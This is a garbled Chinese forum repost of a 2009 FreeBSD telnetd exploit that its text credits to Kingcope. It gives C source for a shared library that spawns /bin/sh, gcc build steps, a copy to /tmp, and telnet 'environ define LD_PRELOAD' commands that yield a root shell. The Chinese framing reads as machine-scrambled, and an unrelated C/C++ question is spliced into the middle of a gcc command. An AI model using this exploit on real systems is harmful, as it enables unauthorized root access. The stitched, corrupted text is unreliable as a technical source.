FreeBSD爆0day
远程能溢出当天可提权去历:比特网论坛
出念到目下现古有人会研讨,看到后歌颂了一下。是telnetd部门的标题成绩,正在FreeBSD7.0正式版测试经过进程,7.1如同也有一样标题成绩http://www.333cf.com/QQFC/622.html,但已过测试。涌愉喜好的朋友可以或许调试一下,代码以下:
# FreeBSD telnetd local/remote privilege
escalation/codeexecution
# remote root only when accessible ftp or similar available
# tested on FreeBSD 7.0-RELEASE
# by Kingcope/2009
#include
#include
#include
#include
void _init() {
FILE *f;
setenv("LD_PRELOAD","", 1);
system("echoALEX-ALEX;/bin/sh");
}
---snip-----
Then we compile this stuff.
---snip-----
#gcc -o program.o -c program.c -fPIC
#gcc -shared -Wl,-soname,libno_
C-C++通报个变量到函数的参数里,减进运算完了变量值波动?
ex.so.1 -o libno_ex.so.1.0 program.o
-nostartfiles
---snip-----
Then we copy the file to a known location (local
rootexploit)
---snip-----
#cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
---snip-----
...or we upload the library through any other available
attackvector.
After that we telnet to the remote or local FreeBSD
telnetdaemon
with setting the LD_PRELOAD environment variable to the
knownlocation
as a telnet option before.
---snip-----
#telnet
/>auth disable SRA
/>environ define LD_PRELOAD/tmp/libno_ex.so.1.0
/>open target
---snip-----
ALEX-ALEX
#ROOTSHELL